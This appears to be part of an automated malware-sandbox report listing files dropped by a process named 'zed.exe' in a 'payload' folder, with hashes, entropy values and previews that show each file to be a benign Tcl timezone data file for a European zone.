                                                                                                                                                                                                                                            SSDEEP:48:7PvCAs6kKR6aQmF1cSNWrI+AjQnTRYZ/YF0LUdt/LkajuZbIJltiabs2Tb:7HCAs6kC6aZF1cSN4I+AjQTRYZ/YF0Lw
                                                                                                                                                                                                                                            MD5:965D987F6576F66A08871697144D4CDB
                                                                                                                                                                                                                                            SHA1:AF7226DF81C2B3C3A5832F59FC708A6BCBF389CA
                                                                                                                                                                                                                                            SHA-256:8F395352AA05D35E7D13380E73659A0D5B56FFC17E3F4E40E4F678A902F0E49B
                                                                                                                                                                                                                                            SHA-512:B82E0CFA5EDA0FCDF03609AE439255F8937A7E9EFA0AFE15EA8877316782AFC74514BCD2B4F06F1B5F0F3C5A64A933D73CB50D5AED2BB1491BD6CACBB77B10E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Samara) {.. {-9223372036854775808 12020 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-1102305600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 10800 0 +03}.. {687916800 14400 0 +04}.. {701820000 18000 1 +05}.. {717544800 14400 0 +04}.. {733
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.955758257767983
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQawELDX7x/yQaxE:SlSWB9vsM3ymx5PHAIgoxvN/yt/yrE
                                                                                                                                                                                                                                            MD5:D253DA6880630A31D39DB0CFA4933ABD
                                                                                                                                                                                                                                            SHA1:E5798DAAE574729685FE489F296B964BC1CCF2E4
                                                                                                                                                                                                                                            SHA-256:B6856A0E38C2404F7D5FA1821559503F8AE70923A562F0D993124D131515F395
                                                                                                                                                                                                                                            SHA-512:CFB6005F3E8D1C585AF36EB7A8C9F49760EF6F446C97E7804EB61EFD0804424C4FB6AE81B71C5A867274EF89A17DAC0D2A0FF882A0F6AEA1D5FFD51593726C5F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/San_Marino) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.937834327554967
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawEX3GEaQa5:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNZ
                                                                                                                                                                                                                                            MD5:F7C7DAE9C5D371EF9EE1F490246ED3CC
                                                                                                                                                                                                                                            SHA1:40C388FE2A55078C8E0524A4385B3F8846960E24
                                                                                                                                                                                                                                            SHA-256:BC00D953C2F3E55E40EDA13838AB66B9E9D0BDAD620E4EB917637761ABB06FB1
                                                                                                                                                                                                                                            SHA-512:EB22C59F4D58D96797A718FC59B010795F587626E456D44A3E6398E0FBF4ECD97BCDC151BC1359151798B5AF2964FE5708233F8ECD0D344C3E27629F2645687F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2061
                                                                                                                                                                                                                                            Entropy (8bit):3.6638125261109824
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:yFvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDQ:yhCAs6kC6aZF1cSNcjXgV/ApDFjDQ
                                                                                                                                                                                                                                            MD5:CC4D7C478790588D232568CAB12D8E67
                                                                                                                                                                                                                                            SHA1:07A7CFCFFFF91D124EDFC99F5053BAFC79FBB12B
                                                                                                                                                                                                                                            SHA-256:AB90363DEE5077C39EC55FE8E519593FF08223E5A8E593F6CCE01FB5B8B35BAE
                                                                                                                                                                                                                                            SHA-512:23944D20624C942CFDE58F1019160D64401BD0AFB8C3EC49F904038482FAA6741812548C860A2DAE050B8D17A7E08ED9C6EBE7FF19393CFA46D78B1D21B1CACA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Saratov) {.. {-9223372036854775808 11058 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {780
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2389
                                                                                                                                                                                                                                            Entropy (8bit):3.9491446081772748
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:wM2wE0xhuHJkYaVV0XOnbdSisa0ewEKGfUslIYtq8X:UwEAEpkzVFgaNl7
                                                                                                                                                                                                                                            MD5:03E05E60E064198BF6562B2E6E8DA8D2
                                                                                                                                                                                                                                            SHA1:51461207B671536CD4A7587BA283DE2D0017AA4A
                                                                                                                                                                                                                                            SHA-256:D51CD3DE50C50BCA1624EFC952ADD15D418A09EC213760DF5BC3097E35C5A7A0
                                                                                                                                                                                                                                            SHA-512:73B7773DABE19F20DD211E178B822FD35620DC4AC8B9D20259971B1157ED7A60A5A41026258FAA8B15016268D241ED804AC1307CACDA00D6FE657407D254B02C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Simferopol) {.. {-9223372036854775808 8184 0 LMT}.. {-2840148984 8160 0 SMT}.. {-1441160160 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-888894000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-811645200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {646786800 7200 0 EET}.. {701042400 7200 0 EET}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.953089768975736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawOgpr8Qahr:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNO
                                                                                                                                                                                                                                            MD5:0BF8ADBB63F5D6187C75FF1B0BAC761E
                                                                                                                                                                                                                                            SHA1:7DE15E767D34812F784CE6E85438A592E2CBA418
                                                                                                                                                                                                                                            SHA-256:52F20858433261B15797B64F0A09CEE95D552EF93B5DAA7C141BFAB6D718C345
                                                                                                                                                                                                                                            SHA-512:27D395635427C8FA1A4E0063A32F482701D2CC7C7724B4A06E661D4A419D23E219672888D37367FE5E70B6872914EB9EE034AE359DCB6A4C4CE05CA34C3589A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7654
                                                                                                                                                                                                                                            Entropy (8bit):3.727428614069594
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:8lmG4+K7Gjz5CXNUatpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:8lmGWwkdUasivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:91357DFC23ADB0CE80C463E4B6D896BE
                                                                                                                                                                                                                                            SHA1:273F51BE4C67A9AC1182F86AC060E963684151D5
                                                                                                                                                                                                                                            SHA-256:6415F279CB143EA598CF8272263AC5B502827B10CEEB242B39E6EFCC23A2EE12
                                                                                                                                                                                                                                            SHA-512:8EA7E2D4C2239879A4D6CCE302C38A6D2A9093A2CADEF4F4294E60D373AB9A2C468BA6E3D54DEC7F73D954CE5226EF2B022F8BDEF29B3B4AAB3838B05C72EA29
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Sofia) {.. {-9223372036854775808 5596 0 LMT}.. {-2840146396 7016 0 IMT}.. {-2369527016 7200 0 EET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-781048800 7200 0 EET}.. {291762000 10800 0 EEST}.. {307576800 7200 0 EET}.. {323816400 10800 1 EEST}.. {339026400 7200 0 EET}.. {355266000 10800 1 EEST}.. {370393200 7200 0 EET}.. {386715600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465350400 7200 0 EET}.. {481075200 10800 1 EEST}.. {496800000 7200 0 EET}.. {512524800 10800 1 EEST}.. {528249600 7200 0 EET}.. {543974400 10800 1 EEST}.. {559699200 7200 0 EET}.. {575424000 10800 1 EEST}.. {591148800 7200 0 EET}.. {606873600 10800 1 EEST}.. {62259
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.956798438511978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQawRMNSTyQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yqMNSTm
                                                                                                                                                                                                                                            MD5:ACFB8E2D1D4BA0D2D46410F2F2823B21
                                                                                                                                                                                                                                            SHA1:4AC3A19E94DE606DFF7D93BC6C7F113F3D2D083A
                                                                                                                                                                                                                                            SHA-256:64615AEA9EF14A2609D2C804901281C83FDDC0A8BCA9B377D6CAD62D81801C66
                                                                                                                                                                                                                                            SHA-512:2E23AC0DE7D3D0CF2BA4FE3EE31E15EB614A7442097578209D38CE2FF2E3DF006881463866FE67DD4DDEAB179E5CD2946E8A9E8F7401F1B953E9AB216EC753F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Stockholm) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7549
                                                                                                                                                                                                                                            Entropy (8bit):3.76585669030767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:dUusEpkjXkSV3AMaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:O0WjUSWivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:54EF0224F5E28FA78F212EC97D4AE561
                                                                                                                                                                                                                                            SHA1:FA7C9A951ED943F1E1E609D2253582016BC26B57
                                                                                                                                                                                                                                            SHA-256:6F3594CCDA78B02B2EE14C8FAE29E668E47193AF2DFCF5AF1ECD210F13BCE9CE
                                                                                                                                                                                                                                            SHA-512:2D1CA2BB1945AE5E3F56AF8FA7F950CE7169F215C783E683634581C5EC01B54159E47A0E9551897077BBEAB06158906029A4E4B0051A263D9E5D903EA9DA1692
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tallinn) {.. {-9223372036854775808 5940 0 LMT}.. {-2840146740 5940 0 TMT}.. {-1638322740 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1593824400 5940 0 TMT}.. {-1535938740 7200 0 EET}.. {-927943200 10800 0 MSK}.. {-892954800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-797648400 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 10800 1 EEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7675
                                                                                                                                                                                                                                            Entropy (8bit):3.809498345470167
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:n05NWKIHBJ9AE4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt:0iKqxAE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:1983B88075A92942209BB2B80E565F4E
                                                                                                                                                                                                                                            SHA1:12A0401026C5C036144FD1D544173AAB39969F61
                                                                                                                                                                                                                                            SHA-256:C62686BF598138FEFB72E8CC6632BA75A5FE147F2A30124EE3583BE1F732E38D
                                                                                                                                                                                                                                            SHA-512:E95C38FA0A2B526C00B9DCF5CDF53059DECF64B085AA18BE000968DA626561944415D053CF7A5C32BC672085538920CFD67A3A3B627CFD5B1A4C9CEC49AA3F96
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tirane) {.. {-9223372036854775808 4760 0 LMT}.. {-1767230360 3600 0 CET}.. {-932346000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-843519600 3600 0 CET}.. {136854000 7200 1 CEST}.. {149896800 3600 0 CET}.. {168130800 7200 1 CEST}.. {181432800 3600 0 CET}.. {199839600 7200 1 CEST}.. {213141600 3600 0 CET}.. {231894000 7200 1 CEST}.. {244591200 3600 0 CET}.. {263257200 7200 1 CEST}.. {276040800 3600 0 CET}.. {294706800 7200 1 CEST}.. {307490400 3600 0 CET}.. {326156400 7200 1 CEST}.. {339458400 3600 0 CET}.. {357087600 7200 1 CEST}.. {370389600 3600 0 CET}.. {389142000 7200 1 CEST}.. {402444000 3600 0 CET}.. {419468400 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {457480800 7200 0 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 C
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.906212162381389
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV+NM/LWXHAIgoq9NM/HARL/yQa3MPgJM1p8QagNMj:SlSWB9vsM3ymI6CHAIgoI6HAN/ytM4MO
                                                                                                                                                                                                                                            MD5:E0C99DB7673EEE440BA1848046455BA1
                                                                                                                                                                                                                                            SHA1:1BCCC1BE46306DEF8A9CA249DE8FA11FC57CC04D
                                                                                                                                                                                                                                            SHA-256:FDD53FDB5F754BBBA8FF98F0B1555FE0BAEB7852843220A7CF93A190B641A9AD
                                                                                                                                                                                                                                            SHA-512:CD56B540AE9084DEAA9D0A1DBBAF89733C465424C22CE74696B9AE90FD4FEFAB265CF23C5B13A7F04597D75FD0147BD593E0552B56D87372170CB4CA1BFC8259
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Chisinau)]} {.. LoadTimeZoneFile Europe/Chisinau..}..set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2119
                                                                                                                                                                                                                                            Entropy (8bit):3.680951255407528
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:kFvCAs6kKR6aQmF1cSNWrI+AjQndgV/Ap40FjDOP:khCAs6kC6aZF1cSN4I+AjQdgV/ApDFj4
                                                                                                                                                                                                                                            MD5:83C86E437B5FBA1DC9CC5235396AC381
                                                                                                                                                                                                                                            SHA1:5493A59C3A5A1B55ACD493E67F9E29D2A415A8DB
                                                                                                                                                                                                                                            SHA-256:9FA9D09509B4F8F5A9C8E422DBA02605070C3EBDAEB7C1DF8527C8EEF5E3632D
                                                                                                                                                                                                                                            SHA-512:86222489C65C87646939DECF91C2EC336EB46F64B644526A3FA8A4854B9D11819F6FD253107AB8A3DE911E254C88092D25137442164A6E437CDAF258A7CBB66C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Ulyanovsk) {.. {-9223372036854775808 11616 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 7200 0 +02}.. {695779200 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):5.051734481833866
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa2rUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yFC
                                                                                                                                                                                                                                            MD5:17A0CC51331756920B13FFA3FF556751
                                                                                                                                                                                                                                            SHA1:C575FEF4F053393C57B34C7C7B0C1E9605413792
                                                                                                                                                                                                                                            SHA-256:F8CAF5DBE12F1647B28E7CCDDB2E09E36788A766690D12E770A8ABD82E708644
                                                                                                                                                                                                                                            SHA-512:E73F0FE5BE4DD91948A88DC895E148D81267576BA3BCFEA777E25C01EAE9C06845DBFFB651526045B70B7A3CCDB195DFFF60486C01E0A115DFB856873970008E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Uzhgorod) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.953146873643623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQa1NEHp8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/yvNEJ8G
                                                                                                                                                                                                                                            MD5:A0BAEC8B6AF1589ECBE52667DDB2A153
                                                                                                                                                                                                                                            SHA1:37093F4F885CBFA90A1F136D082E8B7546244ACC
                                                                                                                                                                                                                                            SHA-256:06B235BF047FC2303102BC3DC609A5754A6103321D28440B74EEC1C9E3D24642
                                                                                                                                                                                                                                            SHA-512:DBEC235AFB413FA8D116FA1AFFE73706762E7458038B6D68E0BFD71C339510D766825BA97055A06DEE14D5880EAE6CD035BFE0C935C0DF44B0107A356D293A78
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Vaduz) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.914414313741477
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQa1xLM1p8QaxE:SlSWB9vsM3ymx5PHAIgoxvN/yvN+8rE
                                                                                                                                                                                                                                            MD5:2404265F8DE1F7D7745893DD4752BA1C
                                                                                                                                                                                                                                            SHA1:C07E7F72DBDC7F5F746385523EA733C2714F5DA2
                                                                                                                                                                                                                                            SHA-256:C203E94465BD1D91018FC7670437226EF9A4BB41D59DDE49095363865CA33D00
                                                                                                                                                                                                                                            SHA-512:5C20834542B74041AAB1DBE35686781B32EEB5814B1A35A942E87D1FC3B6D8F9264CB90433C44A480EA86DDEA65D8C152F41CE3E983C1DE5FA74D6FB5208F701
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/Vatican) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7930
                                                                                                                                                                                                                                            Entropy (8bit):3.8193566380830273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:8F6zq+gH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:8ozE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:6A3A8055DD67174E853C7A208BABAC9B
                                                                                                                                                                                                                                            SHA1:64445543DE9D6C01FA858442976E249E37BE23EF
                                                                                                                                                                                                                                            SHA-256:A8165313C9B51DAEF130401439CBA60DAA9887FC5EAA61A5AFD4F7BAD1AD934F
                                                                                                                                                                                                                                            SHA-512:4407B9E8709A8DD05337A10030895AA9876EAF64EF5347952249EE2A541E304331B46D38532FD7CDFF9E633BF8C9884282F0A5ED259EBA1D99DC0914AF1A50C6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vienna) {.. {-9223372036854775808 3921 0 LMT}.. {-2422055121 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1577926800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555801200 3600 0 CET}.. {-938905200 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780188400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {323823600 7200 1 CEST}.. {338940000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CE
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7485
                                                                                                                                                                                                                                            Entropy (8bit):3.7711709848169592
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:FAhEpkwCXkSV3A/PplKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:FfWHUSKivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:1AB5FCEACC4E09074BA9F72F0B7747D5
                                                                                                                                                                                                                                            SHA1:E0134E61EC0ADC60BF6DB4544EA7B7FFA4EC7857
                                                                                                                                                                                                                                            SHA-256:B762DB4A068DC79FA57691E070D7026086E5A6D2FC273D5C1872E7C8E3711533
